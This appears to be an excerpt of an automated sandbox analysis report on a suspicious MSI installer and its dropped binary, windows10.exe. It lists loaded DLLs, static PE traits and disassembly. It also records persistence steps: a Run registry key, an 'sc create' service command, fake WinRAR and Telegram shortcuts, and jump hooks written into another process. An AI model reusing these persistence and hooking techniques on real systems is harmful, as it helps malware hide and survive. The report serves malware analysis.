            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: mpr.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: magnification.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wtsapi32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: d3d9.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dwmapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dwmapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wldp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wsock32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: winmm.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: winsta.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: userenv.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: slwga.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: sppc.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: netapi32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: samcli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wkscli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: srvcli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: netutils.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: schedcli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: logoncli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: security.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: secur32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: powrprof.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: umpdc.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wevtapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: olepro32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: activeds.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: adsldpc.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dxva2.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: riched20.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: usp10.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: msls31.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dataexchange.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: d3d11.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dcomp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dxgi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: twinapi.appcore.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: cscapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: sxs.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: amsi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: profapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: idndl.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: napinsp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: pnrpnsp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wshbth.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: nlaapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: mswsock.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: winrnr.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: textshaping.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: textinputframework.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: coreuicomponents.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: coremessaging.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: coremessaging.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: mpr.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: magnification.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wtsapi32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: d3d9.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dwmapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wldp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wsock32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: winmm.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: winsta.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: userenv.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: slwga.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: sppc.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: netapi32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: samcli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wkscli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: srvcli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: netutils.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: schedcli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: logoncli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: security.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: secur32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: powrprof.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: umpdc.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wevtapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: olepro32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: activeds.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: adsldpc.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dxva2.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: riched20.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: usp10.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: msls31.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dataexchange.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: d3d11.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dcomp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dxgi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: twinapi.appcore.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: sxs.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: amsi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: profapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: idndl.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: napinsp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: pnrpnsp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wshbth.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: nlaapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: mswsock.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: winrnr.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\Installer\MSI5DCF.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWindow found: window name: TMainForm
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: OK
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAutomated click: Next >
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: CrzA2u67LQ.msiStatic file information: File size 31430144 > 1048576
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbC source: MSI5DCF.tmp, 00000003.00000000.1726216258.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp, MSI5DCF.tmp, 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp, MSI5DEF.tmp, 00000004.00000000.1726938190.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp, MSI5DEF.tmp, 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp, CrzA2u67LQ.msi, MSI5DEF.tmp.1.dr, MSI5DCF.tmp.1.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: CrzA2u67LQ.msi, MSI55AB.tmp.1.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: MSI5DCF.tmp, 00000003.00000000.1726216258.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp, MSI5DCF.tmp, 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp, MSI5DEF.tmp, 00000004.00000000.1726938190.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp, MSI5DEF.tmp, 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp, CrzA2u67LQ.msi, MSI5DEF.tmp.1.dr, MSI5DCF.tmp.1.dr
            Source: initial sampleStatic PE information: section where entry point is pointing to: .F~x
            Source: StarBurn.dll.1.drStatic PE information: section name: .didata
            Source: StarBurn.dll.1.drStatic PE information: section name: .Hm8
            Source: StarBurn.dll.1.drStatic PE information: section name: .?#3
            Source: StarBurn.dll.1.drStatic PE information: section name: .F~x
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AF81F0 push ecx; ret 3_2_00AF8203
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B081F0 push ecx; ret 4_2_00B08203
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00A6C2E8 push esi; ret 5_2_00A6C2E9
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00A72214 push ecx; mov dword ptr [esp], ecx5_2_00A72219
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00A70FD8 push ecx; mov dword ptr [esp], edx5_2_00A70FD9
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00A70B44 push ecx; mov dword ptr [esp], edx5_2_00A70B49
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00AC827C push ecx; mov dword ptr [esp], ecx5_2_00AC827D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00AC3396 push cs; ret 5_2_00AC3398
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00AC3734 push ecx; mov dword ptr [esp], edx5_2_00AC3735
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00BC5930 push ecx; mov dword ptr [esp], eax5_2_00BC5932
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00BC5B48 push 00BC5BF4h; ret 5_2_00BC5BEC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00BB0698 push ecx; mov dword ptr [esp], edx5_2_00BB0699
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00BC7FE4 push ecx; mov dword ptr [esp], edx5_2_00BC7FE5
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00BE60B0 push ecx; mov dword ptr [esp], ecx16_2_00BE60B4
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00BF203C push ecx; mov dword ptr [esp], edx16_2_00BF203D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00BED020 push ecx; mov dword ptr [esp], edx16_2_00BED021
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00C3917C push ecx; mov dword ptr [esp], ecx16_2_00C39181
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00BB7160 push 00BB71F6h; ret 16_2_00BB71EE
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00BE629C push ecx; mov dword ptr [esp], ecx16_2_00BE62A0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00BF02E8 push ecx; mov dword ptr [esp], edx16_2_00BF02E9
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00C41210 push 00C41254h; ret 16_2_00C4124C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00C193E8 push 00C194E8h; ret 16_2_00C194E0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00BEE32C push ecx; mov dword ptr [esp], edx16_2_00BEE32D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00BF15F0 push ecx; mov dword ptr [esp], edx16_2_00BF15F1
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00BEC5D0 push ecx; mov dword ptr [esp], edx16_2_00BEC5D1
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00BEA540 push ecx; mov dword ptr [esp], edx16_2_00BEA541
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00BF3698 push ecx; mov dword ptr [esp], edx16_2_00BF3699
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00BAC690 push 00BAC6C8h; ret 16_2_00BAC6C0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00B60698 push ecx; mov dword ptr [esp], edx16_2_00B60699
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00BEF898 push ecx; mov dword ptr [esp], edx16_2_00BEF899
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00BE9890 push ecx; mov dword ptr [esp], edx16_2_00BE9891

            Persistence and Installation Behavior

            barindex
            Drops executables to the windows directory (C:\Windows) and starts them
            Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI5DEF.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI5DCF.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\Pictures\fotosdaviagem\StarBurn.dllJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\Pictures\fotosdaviagem\windows10.exeJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5DCF.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5783.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI55AB.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5723.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5762.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5DEF.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5820.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5DCF.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5783.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI55AB.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5723.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5762.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5DEF.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5820.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRARJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Telegram DesktopJump to behavior
            Source: C:\Windows\System32\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Run windowsJump to behavior
            Source: C:\Windows\System32\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Run windowsJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto

            Hooking and other Techniques for Hiding and Protection

            barindex
            Overwrites code with unconditional jumps - possibly settings hooks in foreign process
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6388 base: 6E0005 value: E9 8B 2F 82 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6388 base: 76F02F90 value: E9 7A D0 7D 89 Jump to behavior
